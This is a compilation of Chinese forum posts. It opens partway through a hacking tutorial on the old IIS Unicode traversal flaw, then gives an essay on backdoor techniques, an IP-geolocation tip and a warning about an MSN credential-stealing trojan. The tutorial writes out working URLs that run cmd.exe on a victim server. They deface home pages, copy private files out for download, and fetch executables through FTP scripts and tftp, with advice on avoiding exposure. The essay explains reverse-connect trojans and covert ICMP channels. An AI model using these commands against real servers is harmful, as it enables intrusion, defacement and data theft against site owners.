學 過dos的應該可以看懂,其實就是利用當中的非法請求使我們可以連到system32下,如果inetpub\目錄不合winnt同盤,或者目錄級數有改動,可能會引起請求失敗。

如果成功,那麼在流覽區可看到如下資訊:
Directory of C:\inetpub\scripts
2000-09-28 15:49
DIR .
2000-09-28 15:49
DIR .. (假設目錄中沒有檔,實際上有一大 堆)
是不是有自己機器的感覺了,正點!就 是這種感覺!

cmd.exe相 當與dos裡 的command.com,因 此,我們可以執行很多命令了!

http://11.11.22.22/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
(這 個命令同樣道理)
大家請注意:/c後面的+,實際上,他就是空格,請記牢!dir開始就是dos命令了,我們可以更改一下:
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

dos的朋友一定懂其意義了,不懂的請去看書
不用說,大家也知道我們就可以利用它來對有漏洞的機器展開攻擊了!

三、實戰演練:

1、修改主頁(是不是很爽?):

一般主頁位置在c:\inetpub\wwwroot下, 但要是改了路徑,就需要找找了。

最方便的方法:在流覽器裡輸入 http://11.11.22.22/.ida,要是有漏洞,那在流覽器裡便會顯示主頁路徑,這個漏洞存在 率很高,自然是我們的首選。

分 析法:用dir看各個盤符的根目錄,看可疑的 就進去看,運氣好的在一分鐘裡找到,這要看運氣和直 覺。

dir/s法:首先在看其主頁,找個圖片或連接,看它的檔案名,比如,11.11.22.22首 頁上有一幅圖片,右擊,屬性,看到了嗎?iloveu.gif, 然後我們利用unicode輸入這條命令dir c:\iloveu.gif /s意 味著查找c盤下所有目錄裡的iloveu.gif, 注意實際應用時別忘了把空格改為+,如 果沒有繼續找d盤, 很快就能確定主頁目錄的。

找 到了目錄,就要對它開刀了!一般默認收頁為index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中 的一個,現在我們確定11.11.22.22中為index.htm

那 麼我們就修改它吧!

最 方便的方法:

1echo法:

echo是一個系統命令,主要用於設置回應開關,而echo cshu >c:\autoexe.bat就是把cshu加 入autoexec.bat裡並刪除原有內容,echo cshunice >>c:\autoexec.bat就 是加入cshunice但 不刪除原有內容,這樣我們就可以逍遙的改了。
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
回 應為:HTTP 500 - 內部伺服器錯誤
通 過對cmd的分析,袁哥得出一條簡便的方 法,加入"符 號
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm
回 應為:cgi錯誤,不用理會
兩條 命令一下,呵呵,再看看11.11.22.22, 是不是烙上我們的大名了?不錯吧
而在實際 操作中,可能袁哥的方法也會失效,這時,我們就可以copy cmd.exe 為另一個exe,記住路徑,用copy後的來echo
例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe
11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

2、上傳法:

echo有 點不講道理,把人家的文件破壞了,要是想在主頁上增光添彩,那就應該用改好的主頁上傳,這個我們後面介紹。

幾 點忠告:

1、對於沒有主頁的機器(就是正在建立的主頁),不要改它,這很沒水準,也很沒道德

2echo前記得幫他們做好備份。

3、不准在主頁裡加入惡性語句。

4、下載檔案

要 是有什麼有用的檔被你發現,那我們如何下載呢?
最 簡單的方法:把檔copy至網頁目錄下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然 後,下載11.11.22.22/baby.zip就行了,注意!實際應用中要記得對檔案名進行 修 改,總之不能暴露。

別 的方法:對不起,沒想好!

2、最重要的上傳

一般方法、ftp
首先建一個ftp指 令檔:c:\hehe.haha(名字亂取 把),申請一個ftp帳 號,然後用echo吧!

echo+open ftp.cshu.comftp主機) > c:\hehe.haha
echo+user yourname >> cc:\hehe.haha (yourname
是 用戶名)
echo+yourpasswd >> c:\hehe.haha (yourpasswd
是 密碼)
echo+get setup.exe >> c:\hehe.haha
要 下載的文件
echo+quit >> c:\hehe.haha

完 了以後:ftp+/s:c:\hehe.haha, 由於是ftp主 機,那麼速度一定很快,過一會setup.exe就 會出現在目前的目錄了(也就是cmd所在目錄)。
別 忘了先上傳到ftp主機,不要做馬大哈哦!
最 簡單的方法:tftp法。
這種方法 不用中轉伺服器,首先準備一個tftp服務端,它的作用就是把你的機器做成一個tftp伺 服器,利用漏洞機器來下載(注意,運行tftp時 不要運行其他的ftp軟體
在 這裡我推薦cisco tftp server, 自己去找找把,實在沒有來找我。)
安裝好 後運行,別忘了設置好預設目錄,否則會找不到檔。
tftp
命 令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exeihateu.exe在預設目

4種後門技術知識講解

摘自:http://twnzone.org/discuz/viewthread.php?tid=175685& extra=page%3D2

正在暗渡陳倉 4種後門技術知識講解
曾經飽受木馬、後門(以下統稱後門)侵害的人們都不會忘記機器被 破壞後的慘象,於是人們展開了積極的防禦工作,從補丁到防火牆,恨不得連網線都加個驗證器,在多種多樣的防禦手法夾攻下,一大批後門倒下了,菜鳥們也不用 提心吊膽上網了…… 可是後門會因此罷休嗎?答案當然是否定的。君不見,在風平浪靜的陸地下,一批新的後門正在暗渡陳倉……

  1、反客為 主的入侵者

  黑客A連接上了網絡,卻不見他有任何行動,他在幹什麼呢?我們只能看見他燃起一支煙,似乎在發呆……過了一會兒,他突然把煙 頭一丟,雙手迅速敲擊鍵盤,透過屏幕,我們得知他已經進入了一個企業內部的服務器,一台安裝了防火牆、而且深居內部的服務器……他怎麼做到的呢?莫非他是 神仙?請把鏡頭回退到剛才那一幕,黑客A在煙霧熏繞中盯著一個程序界面出神,突然,那個界面變動了一下,同時,黑客A也開始敲打鍵盤,接下來就是熟悉的控 制界面。各位也許不相信自己的眼睛了:難道是那台機器自己找上他的?不可能…… 可是這是事實,真的是服務器自己找上來的。黑客A也不是高技術,他只是使用了一種反客為主的後門——反彈木馬。

  眾所周知,通常說的入侵 都是入侵者主動發起攻擊,這是一種類似捕獵的方式,在警惕性高的獵物面前,他們已經力不從心;可是對於使用反彈技術的入侵者來說,他們卻輕鬆許多,反彈木 馬就如一個狼外婆,等著小紅帽親自送上門去。一般的入侵是入侵者操作控制程序去查找連接受害計算機,而反彈入侵卻逆其道而行之,它打開入侵者電腦的一個 端口,卻讓受害者自己與入侵者聯繫並讓入侵者控制,由於大多數防火牆只處理外部數據,對內部數據卻閉上眼睛,於是,悲劇發生了。

  反彈木 馬的工作模式如下:受害者(被植入反彈木馬服務端的計算機)每間隔一定時間就發出連接控制端的請求,這個請求一直循環到與控制端成功連接;接下來控制端接 受服務端的連接請求,兩者之間的信任傳輸通道建立;最後,控制端做的事情就很普通了——取得受害者的控制權。由於是受害者主動發起的連接,因此防火牆在大 多數情況下不會報警,而且這種連接模式還能突破內網與外部建立連接,入侵者就輕易的進入了內部的計算機。

  雖然反彈木馬比起一般木馬要可 怕,但是它有天生的緻命弱點:隱蔽性還不夠高,因為它不得不在本地開放一個隨機端口,只要受害者有點經驗,認出反彈木馬不是難事。於是,另一種木馬誕生 了。

  2、不安分的正常連接

  現在有很多用戶都安裝了個人HTTP服務器,這就注定了機器會開著80端口,這很正常,但 是有誰知這是一個給無數網絡管理員帶來痛苦的新技術,它讓一個正常的服務變成了入侵者的利器。

  當一台機器被種植Tunnel後,它的 HTTP端口就被Tunnel重新綁定了——傳輸給WWW服務程序的數據,也在同時傳輸給背後的Tunnel,入侵者假裝瀏覽網頁(機器認為),卻發送了 一個特殊的請求數據(符合HTTP協議),Tunnel和WWW服務都接收到這個信息,由於請求的頁面通常不存在,WWW服務會返回一個HTTP404應 答,而Tunnel卻忙開了……

  首先,Tunnel發送給入侵者一個確認數據,報告Tunnel存在;然後Tunnel馬上發送一個新 的連接去索取入侵者的攻擊數據並處理入侵者從HTTP端口發來的數據;最後,Tunnel執行入侵者想要的操作。由於這是「正常」的數據傳輸,防火牆一樣 沒看見。但是目標沒開放80端口怎麼辦呢?擅自開一個端口等於自殺。但是入侵者不會忘記那個可愛的NetBIOS端口——長年累月開放的139端口,和它 分享數據,何樂不為? Tunnel技術使後門的隱蔽性又上了一個級別,可是這並不代表無懈可擊了,因為一個有經驗的管理員會通過Sniffer看到異常的景象…… Tunnel攻擊被管理員擊潰了,可是,一種更可怕的入侵正在偷偷進行中……

3、無用的數據傳輸?

  1.眼皮底下的偷竊者 ——ICMP

  ICMP,Internet Control Message Protocol(網際控制信息協議),最常見的網絡報文,近年來被大量用於洪水阻塞攻擊,但是很少有人注意到,ICMP也偷偷參與了這場木馬的戰爭…… 最常見的ICMP報文被用作探路者——PING,它實際上是一個類型8的ICMP數據,協議規定遠程機器收到這個數據後返回一個類型0的應答,報告「我在 線」。可是,由於ICMP報文自身可以攜帶數據,就注定了它可以成為入侵者的得力助手。由於ICMP報文是由系統內核處理的,而且它不佔用端口,因此它有 很高的優先權。ICMP就像系統內核的親戚,可以不受任何門衛阻攔,於是,籃子裡藏著武器的鄉下老人敲響了總統的房門……

  使用特殊的 ICMP攜帶數據的後門正在悄然流行,這段看似正常的數據在防火牆的監視下堂而皇之的操縱著受害者,即使管理員是個經驗豐富的高手,也不會想到這些「正 常」的ICMP報文在吞噬著他的機器。有人也許會說,抓包看看呀。可是,實際應用中,傳遞數據的ICMP報文大部分肯定是加密過的,你怎麼檢查?

   不過,ICMP也不是無敵的,有更多經驗的管理員乾脆禁止了全部ICMP報文傳輸,使得這位親戚不得再靠近系統,雖然這樣做會影響系統的一些正常功能, 可是為了避免被親戚謀殺,也只能忍了。最親密最不被懷疑的人,卻往往是最容易殺害你的人。

  2.不正常的郵遞員——IP首部的計謀

   我們都知道,網絡是建立在IP數據報的基礎上的,任何東西都要和IP打交道,可是連IP報文這個最基本的郵遞員也被入侵者收買了,這場戰爭永不停歇…… 為什麼呢?我們先略瞭解一下IP數據報的結構,它分為兩個部分,首部和身體,首部裝滿了地址信息和識別數據,正如一個信封;身體則是我們熟悉的數據,正如 信紙。任何報文都是包裹在IP報文裡面傳輸的,通常我們只留意信紙上寫了什麼,卻忽略了信封上是否塗抹了氰酸鉀。於是,很多管理員死於檢查不出的疑症……

   這是協議規範的缺陷導緻的,這個錯誤不是唯一的,正如SYN攻擊也是協議規範的錯誤引起的。相似的是,兩者都用了IP首部。SYN是用了假信封,而「套 接字」木馬則是在信封上多餘的空白內容塗抹了毒藥——IP協議規範規定,IP首部有一定的長度來放置標誌位(快遞?平信?)、附加數據(對信的備註),結 果導緻IP首部有了幾個字節的空白,別小看這些空白,它能攜帶劇毒物質。這些看似無害的信件不會被門衛攔截,可是總統卻不明不白的死在了辦公室……

   入侵者用簡短的攻擊數據填滿了IP首部的空白,如果數據太多,就多發幾封信。混入受害者機器的郵遞員記錄信封的「多餘」內容,當這些內容能拼湊成一個攻 擊指令的時候,進攻開始了……

  結語

  後門技術發展到今天,已經不再是死板的機器對機器的戰爭,它們已經學會考驗人類, 現在的防禦技術如果依然停留在簡單的數據判斷處理上,將被無數新型後門擊潰。真正的防禦必須是以人的管理操作為主體,而不是一味依賴機器代碼,否則你的機 器將會被腐蝕得面目全非……

從Google地圖找到每個IP的上網地區

當你的防駭軟體攔截到 有人企圖入侵、或是有某個IP位址正在對你做不明掃瞄,應該很想查出這個IP的來源吧?或者如果你有架Web網站、FTP站台,看到每天有那麼多人連進你 的電腦,應該 也好奇他們是從哪個國家、哪個城市連過來的吧?想查到某IP的來源地點並不算難,網路上有很多「Whois」的服務可查詢IP位址的所屬單位,不過顯示結 果是一堆文字資訊,要解 讀也是很累人。如果直接在地圖上秀出這個IP的城市位置,那不是清楚多了嗎?現在已有人利用Google地圖做出了這項服務喔!
Step
1. 我們以測試「交大」主機的IP位址為例,在【開始】→【執行】輸入「cmd」按下〔確定〕後,在「命令提示字元視窗」輸入「ping www.nctu.edu.tw」,可以查出網址的相對IP。

2.接著開啟瀏覽器,連至「http://www.ip-adress.com/」, 一開始會顯示你自己的上網IP位址和地圖資訊,你可以換成輸入剛才查到的IP後按下〔lookup any ip〕,就會秀出該IP的位址、經緯度、所屬ISP等訊息,以及「Google Map」的地圖定位。

3.右邊的地圖上方有一些基本控制 項,例如放大、縮小,而點選「Satellite」則可以切換成衛星地圖,就能特寫這個IP所在的地區。另外,按下地圖下方的「Big IP Address Map」,還可以秀出更完整清楚的衛星空照圖。

4.如此一來,我們就可以在「Google Map」上,透過IP定位的方式,順利找到我們想找的地點囉!

※和一般Whois服務一樣,這裡查詢到的IP來源,是發放單位的地址,例 如一般Hinet ADSL網路用戶的IP,就是顯示中華電信公司的所在位置。只有固定IP位址才會定位到真正的上網來源。

用MSN的人一定要看~別被騙了!!!!

相信最近很多人都會收到這封E-mail,告訴你
MSN BlockDetect可以看你的MSN被誰封鎖或是刪除
這個小軟體可以看你MSN上面的朋友,有誰 把你封鎖了或是刪除了
1.下載後解壓縮直接執行
2.在Username裡面填入自己的MSN帳號
3. Password裡填入自己的密碼
4.在登入時,程式會問你在查詢時,MSN會斷線
5.是否接受?選Yes即可
6.左下方的視窗 是把你封鎖的,右下方的視窗是把你刪除的!!!!
請千萬不要使用!這是一個含有【木馬】的病毒程式
目的是盜 取你的MSN帳號與密碼
若有發現 meltdown@hotmail.com加你入msn,請千萬不要加他!!
不要被騙了.請馬上轉達給 你的朋友
因為他帶著病毒!!!
請 告訴你所有的msn聯絡人和你的朋友!!!
如果你其中一個在你通訊欄的朋友一中毒,所有他通訊欄上的朋友
都也逃不過中獎的噩運!!!當然 包括你啦!!!!請快點告訴你的朋友喔